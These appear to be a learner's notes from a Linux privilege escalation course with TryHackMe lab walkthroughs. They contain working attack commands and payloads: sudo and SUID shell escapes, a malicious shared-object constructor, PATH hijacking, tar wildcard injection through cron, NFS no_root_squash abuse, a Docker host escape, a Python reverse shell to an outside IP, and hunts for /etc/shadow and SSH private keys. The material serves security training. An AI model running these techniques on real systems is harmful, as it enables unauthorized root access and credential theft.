TCM Linux Privilege Escalation¶
This section is a practical guide to privilege escalation techniques on Linux systems.
Kernel Exploits¶
GitHub - lucyoa/kernel-exploits
uname -a
OffSec's Exploit Database Archive
Dirty Cow - Exploit > gcc -pthread c0w.c -o cow > ./cow¶
Initial Access¶
Initial Enumeration¶
Info gathering > Scanning & Enumeration > Exploitation
hostname - Gives hint for Exploit
uname -a > To search for exploitation [Super Important]
cat /proc/version
cat /etc/issue
lscpu > Architecture
ps aux > What services are running
ps aux | grep root
Learn Initial Commands¶
whoami
id
sudo -l
cat /etc/passwd
cat /etc/passwd | cut -d (delimeter) : -f (field) 1
cat /etc/shadow
cat /etc/group
history
sudo su -
Network Enumeration¶
ifconfig
ip -a
ip route
arp -a
ip neigh
netstat -ano [netstat is a command-line network utility that displays open network sockets, routing tables, and a number of network interface and network protocol statistics]
Password Hunting¶
grep --color=auto -rnw '/*' -ie "PASSWORD=" --color=always 2> /dev/null
locate password | more
locate pass | more
find / -name id_rsa 2> /dev/null - This is to hunt down the RSA keys present
Exploring Automated Tools¶
LinPeas-
PEASS-ng/linPEAS at master · peass-ng/PEASS-ng
LinEnum -
https://github.com/rebootuser/LinEnum
Linux Exploit Suggester -
https://github.com/mzet-/linux-exploit-suggester
Linux Priv Checker -
https://github.com/sleventyeleven/linuxprivchecker
Escalation Path: Passwords & File Permissions¶
ls -la
cat .bash_history
Escalation via Weak File Permissions¶
ls -la /etc/passwd > The permissions assigned to it are okay which is read
ls -la /etc/shadow > But in this case the permission assigned can be troublesome as only root or admin could have the read write privilege
Escalation via SSH Keys¶
SSH Key¶
Sensitive files¶
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null > we are looking for the private key via using this
The rsa key which we got we can escalate it to get the root user
A In - Depth Explanation of SSH Escalation :¶
What Is Escalation via SSH Keys?¶
SSH key-based escalation involves finding and abusing private/public SSH keys to:
- Switch users (e.g., from a low-priv user to another user or even root)
- Gain persistent access without needing a password
- Escalate privileges if misconfigured keys are found
Why are these files important?¶
1. authorized_keys¶
- Path:
~/.ssh/authorized_keys - This file lists public keys allowed to connect via SSH as that user.
- If you append your own public key to another user's
authorized_keys, you can login as them — without knowing their password.
2. id_rsa (and id_ecdsa, id_ed25519, etc.)¶
- These are private keys, usually stored in
~/.ssh/id_rsa - If you find someone else's private key (e.g.,
/home/admin/.ssh/id_rsa) and the permissions are too lax:- You can copy it locally,
- Set correct file permissions (
chmod 600 id_rsa), -
And connect with it:
ssh -i id_rsa admin@localhost
Escalation Example¶
Suppose you're www-data, and you find this:
/home/dev/.ssh/id_rsa
-
You copy it to your machine:
scp user@target:/home/dev/.ssh/id_rsa . chmod 600 id_rsa -
Then try:
ssh -i id_rsa dev@target
If successful, boom — you're now dev, possibly with higher privileges.
Escalation Path: Sudo¶
1. Sudo Shell Escaping¶
TryHackMe | Cyber Security Training
So now suppose you don't have the password for the root user but one can abuse the Root No Password.
We can use the Shell Escaping method and we can take help from the GTFOBins.
Shell¶
It can be used to break out from restricted environments by spawning an interactive system shell.
vim -c ':!/bin/sh'
Boom we got the root !!!
2. Escalation via Intended Functionality¶
Abusing SUDO (Linux Privilege Escalation) - Touhid's Blog
How to exploit wget ?
What we are doing here is abusing the wget to gain access or something useful
Boom we got the hash !!
3. Escalation via LD_PRELOAD**¶
We can see LD_PRELOAD also known as preloading which is the Dynamic Linker.
nano shell.c
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
We gain the root access
4. Challenge Overview**¶
From Low Privilege Escalation to Root - User
dirsearch - https://github.com/maurosoria/dirsearch
Exploit-DB for Simple CMS - https://www.exploit-db.com/exploits/46635
5. Challenge Walkthrough (Solving the Challenge)**¶
- nmap -A -T4 -p-
- Always check ftp first > ftp
- log in using anonymous and password
- If you get nothing useful return back to the port 80/tcp
- use dirbuster or dirsearch
https://github.com/maurosoria/dirsearch
- python3 dirsearch.py -u http://
-e php,html -x 400,401,401 [Over here -u means url, -e means include, -x means exclude]
Now searchsploit the version of the CMS version 2.2.8
We got SQL vulnerability > Download the py script > python script.py >
give the /path-wordlist here we can give the metasploit wordlist that we already have
As we used the top 100 password list which couldn't help to crack down the password but we retrieved the hash of the password so look around for it in the MD5 database and so on!
We retrieved the password as mitch: secret
We got the low level user
so we can do this without the password: let's go to GTFOBins
Run this :
sudo vim -c ':!/bin/sh'
Boom ! We got the root or sudo vim > :!bash
CVE-2019-14287 Overview¶
The exploit what we need to use:
Overview and Escalation via CVE-2019-18634¶
https://github.com/saleemrashid/sudo-cve-2019-18634
The sudo version is vulnerable :
https://github.com/saleemrashid/sudo-cve-2019-18634/blob/master/exploit.c
Run the vulnerable c code: ./exploit
SUID Overview [Set User ID]¶
We are learning about the fundamentals of read write and execute!
So the read consists of 4 bits, write 2 bits, followed by execute 1 bit.
so a total of 777 for the file to be executed !
chmod +x file or chmod 777 file
Escalation via Shared Object Injection¶
SUID/SGID Shared Object Injection | Linux Privilege Escalation
Linux VM
Use this command to find SUID files:
find / -type f -perm -4000 -ls 2>/dev/null
- From the output, make note of all the SUID binaries.
- Tool we can utilize : strace
- In command line type:
- strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
- From the output, notice that a .so file is missing from a writable directory.
look for so injection or shared object injection
We can also run linpeas, it would have also given the same results.
Detection
As you can see, there is a standard error "No such file or directory", which indicates that the binary is attempting to load the shared object, but it cannot find it in the expected location.
Exploitation
Linux VM
- In command prompt type: mkdir /home/user/.config
- In command prompt type: cd /home/user/.config
- Open a text editor and type:
#include <stdio.h>
#include <stdlib.h>
static void __attribute__((constructor)) inject(void);
void inject(void) {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
- Save the file as libcalc.c
- In command prompt type: gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
- In command prompt type: /usr/local/bin/suid-so
- In command prompt type: id
Escalation via Binary Symlinks:¶
Resource:
Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247
Detection
Linux VM
- In command prompt type: dpkg -l | grep nginx
- From the output, notice that the installed nginx version is below 1.6.2-5+deb8u3.
Exploitation
Linux VM – Terminal 1
- For this exploit, it is required that the user be www-data. To simulate this escalate to root by typing: su root
- The root password is password123
- Once escalated to root, in command prompt type: su -l www-data
- In command prompt type: /home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log
- At this stage, the system waits for logrotate to execute. In order to speed up the process, this will be simulated by connecting to the Linux VM via a different terminal.
Linux VM – Terminal 2
- Once logged in, type: su root
- The root password is password123
- As root, type the following: invoke-rc.d nginx rotate >/dev/null 2>&1
- Switch back to the previous terminal.
Linux VM – Terminal 1
- From the output, notice that the exploit continued its execution.
- In command prompt type: id
Escalation via Environmental Variables:¶
Detection
Linux VM
- In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
- From the output, make note of all the SUID binaries.
- In command prompt type: strings /usr/local/bin/suid-env
- From the output, notice the functions used by the binary.
Exploitation
Linux VM
- In command prompt type: echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
- In command prompt type: gcc /tmp/service.c -o /tmp/service
- In command prompt type: export PATH=/tmp:$PATH
- In command prompt type: /usr/local/bin/suid-env
- In command prompt type: id
Detection
Linux VM
- In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
- From the output, make note of all the SUID binaries.
- In command prompt type: strings /usr/local/bin/suid-env2
- From the output, notice the functions used by the binary.
Exploitation Method #1
Linux VM
- In command prompt type: function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
- In command prompt type: export -f /usr/sbin/service
- In command prompt type: /usr/local/bin/suid-env2
Exploitation Method #2
Linux VM
- In command prompt type: env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
Escalation Path: Capabilities¶
Linux Privilege Escalation using Capabilities
Day 44: Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced.
Capabilities are more secure than SUID's.
getcap -r / 2>/dev/null
Escalation via Capabilities¶
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Final command that gave you a root reverse shell would look like this:
python -c 'import os; os.setuid(0); import socket,subprocess; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",4242)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")'
Escalation Path: Scheduled Tasks¶
Cron & Timers Overview¶
cat /etc/crontab
Escalation via Cron Paths¶
We can exploit overwrite.sh as it has the root privilege.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
Escalation via Cron Wildcards¶
Now let's check what root /usr/local/bin/compress.sh is up to
If a wild card is present we can inject our malicious code !
Step-by-Step Breakdown¶
🔹 Step 1: Discovering a Cron Job¶
You list the contents of the root crontab:
cat /etc/crontab
You find this line:
* * * * * root overwrite.sh
Every minute, as root, the script overwrite.sh is executed.
🔹 Step 2: Crafting a Malicious Script¶
You create runme.sh:
cp /bin/bash /tmp/bash; chmod +s /tmp/bash
This copies bash to /tmp and sets the SUID bit on it, meaning anyone running /tmp/bash can run it with root privileges, if it's owned by root.
🔹 Step 3: Abusing the tar -checkpoint-action Feature¶
You find that /usr/local/bin/compress.sh is a root-owned cron job:
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
But tar supports a lesser-known feature:
--checkpoint=1 --checkpoint-action=exec=sh runme.sh
So you create two files to exploit this:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
When tar czf /tmp/backup.tar.gz * runs, it interprets those files as command-line options! So it executes:
sh runme.sh
as root — because compress.sh is run by the root cron job!
🔹 Step 4: Getting the Root Shell¶
Your script created a SUID bash binary:
/tmp/bash -p
Then you check:
whoami
And it returns:
root
You now have a root shell.
Escalation via Cron File Overwrites¶
Detection
Linux VM
- In command prompt type: cat /etc/crontab
- From the output, notice the script "overwrite.sh"
- In command prompt type: ls -l /usr/local/bin/overwrite.sh
- From the output, notice the file permissions.
Exploitation
Linux VM
- In command prompt type: echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
- Wait 1 minute for the Bash script to execute.
- In command prompt type: /tmp/bash -p
- In command prompt type: id
CMESS TryHackMe Walkthrough¶
Escalation Path: NFS Root Squashing¶
Linux VM
- In command line type: cat /etc/exports
- From the output, notice that "no_root_squash" option is defined for the "/tmp" export.
Exploitation
Attacker VM
- Open command prompt and type: showmount -e MACHINE_IP
- In command prompt type: mkdir /tmp/1
- In command prompt type: mount -o rw,vers=2 MACHINE_IP:/tmp /tmp/1 In command prompt type: echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
- In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x
- In command prompt type: chmod +s /tmp/1/x
Linux VM
- In command prompt type: /tmp/x
- In command prompt type: id
What is Root Squashing?¶
Root squashing is a security feature in NFS that maps the root user (UID 0) on the client to the nobody user on the NFS server.
Purpose: Prevent remote root users from writing or changing files on the NFS server with root privileges.
How Exploitation Can Happen (When Root Squashing Is Disabled)¶
If root squashing is disabled, the root user from a client machine is trusted as root on the NFS share — a dangerous misconfiguration.
Defense Tips¶
- Always use
root_squashin/etc/exports. - Use firewalls or TCP wrappers to restrict NFS access to trusted IPs.
- Consider mapping all users to
nobodywithall_squash.
Escalation Path: Docker¶
TryHackMe | Cyber Security Training
TryHackMe UltraTech:¶
check robots.txt file:
http://10.10.42.77:31331**/partners.html (from robots.txt)**
check page source:
then run following command through link:
http://10.10.42.77:8081/ping?ip=cat utech.db.sqlite
Crack the Hash:
Login through ssh:
ssh r00t@machine_ip
Run following commads:
after run linuxenum.sh we found:
escalate via docker:
Resource:
docker run -v /:/mnt --rm -it bash chroot /mnt sh